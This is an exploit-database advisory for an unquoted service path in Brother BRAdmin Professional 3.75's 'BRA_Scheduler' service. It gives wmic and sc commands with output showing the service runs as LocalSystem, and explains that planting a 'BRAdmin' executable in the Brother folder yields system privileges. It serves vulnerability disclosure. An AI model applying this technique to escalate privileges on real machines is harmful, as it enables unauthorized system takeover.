Share
## https://sploitus.com/exploit?id=PACKETSTORM:161865
# Exploit Title: BRAdmin Professional 3.75 - 'BRA_Scheduler' Unquoted Service Path  
# Date: 2021-03-17  
# Exploit Author: Metin Yunus Kandemir  
# Vendor Homepage: https://global.brother/  
# Software Link: https://support.brother.com/g/b/downloadend.aspx?c=us&lang=en&prod=hls7000dn_us_eu_as&os=10013&dlid=dlf005042_000&flang=4&type3=26  
# Version: 3.75.0000  
# Tested on: Windows 10  
# Source: https://docs.unsafe-inline.com/0day/bradmin-professional-3.75-unquoted-service-path  
  
#Description:  
  
This software allows system administrators to view and control the status of their networked Brother and most other SNMP compliant printing devices.   
If a user can insert a executable which is called as "BRAdmin" under the "C:\Program Files (x86)\Brother\" , local system privileges could be obtained by the user.   
  
#Detection of unquoted service path:  
  
C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "BRAdmin" |findstr /i /v """  
Brother BRAdminPro Scheduler  
BRA_Scheduler   
C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe   
Auto  
  
  
C:\>sc qc BRA_Scheduler  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: BRA_Scheduler  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : Brother BRAdminPro Scheduler  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem